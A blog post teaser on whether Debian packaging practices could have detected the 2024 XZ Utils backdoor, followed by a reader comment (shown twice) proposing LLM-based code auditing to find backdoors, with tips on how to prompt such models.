The discovery of a backdoor in XZ Utils in the spring of 2024 shocked the open source community, raising critical questions about software supply chain security. This post explores whether better Debian packaging practices could have detected this threat, offering a guide to auditing packages and suggesting future improvements.\n
I don’t know about that, but there was an article on TheRegister, a year or so ago perhaps, on some company which was using LLM’s not for generating code, but for auditing code, to flag back-doors, etc, & the guy from the company told the Reg that the stuff the LLM they were using was flagging, was problematic ( like copying user-credentials to some specific server on the internet… )
There are a couple of code-specific LLM’s, & systematically using all of them to audit every project that one is reliant-on, & then checking what they flagged, to see if that is serious or just a mistake ( by LLM or by a coder ), that might increase the discovery-of-problems enough to make it very worth our world’s time/effort.
From what I’ve read about LLM’s, though, you’d have to have problems divided into specific kinds, & you’d have to have examples of that specific problem in a few different languages, to show the LLM, as examples, before you could rely on their finding that-problem in a code-base…
Keep the question small, precise, specific, provide examples, & tell it to ask questions about anything it isn’t clear about before answering, so you aren’t relying on it answering some question you didn’t mean…
IF it removes backdoors, & other malware, then I don’t care if it’s human or derivative: results matter, right?
I don’t know about that, but there was an article on TheRegister, a year or so ago perhaps, on some company which was using LLM’s not for generating code, but for auditing code, to flag back-doors, etc, & the guy from the company told the Reg that the stuff the LLM they were using was flagging, was problematic ( like copying user-credentials to some specific server on the internet… )
There are a couple of code-specific LLM’s, & systematically using all of them to audit every project that one is reliant-on, & then checking what they flagged, to see if that is serious or just a mistake ( by LLM or by a coder ), that might increase the discovery-of-problems enough to make it very worth our world’s time/effort.
From what I’ve read about LLM’s, though, you’d have to have problems divided into specific kinds, & you’d have to have examples of that specific problem in a few different languages, to show the LLM, as examples, before you could rely on their finding that-problem in a code-base…
Keep the question small, precise, specific, provide examples, & tell it to ask questions about anything it isn’t clear about before answering, so you aren’t relying on it answering some question you didn’t mean…
IF it removes backdoors, & other malware, then I don’t care if it’s human or derivative: results matter, right?
_ /\ _